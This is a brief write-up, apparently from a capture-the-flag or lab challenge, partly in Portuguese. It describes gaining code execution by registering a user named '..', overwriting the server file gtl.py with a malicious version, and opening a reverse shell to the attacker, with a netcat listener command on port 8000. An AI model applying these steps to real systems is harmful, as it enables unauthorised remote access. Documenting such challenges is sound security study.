# Code Execution
1. Create user with username: ".."
2. Sign in
3. Upload file gtl.py
4. Original file gtl.py was replace!
5. After restart the docker
6. Open web page (vulnerable)
7. The reverse shell is open

File gtl_hack.py:\
 - Criar a função exploitFunction() onde iremos abrir uma reverse shell para o ip do hacker\
 - Abrir terminal: >> nc hacker_ip 8000 -l\
    Use the shell at will
 
## Fix
Fixed in the other challenges
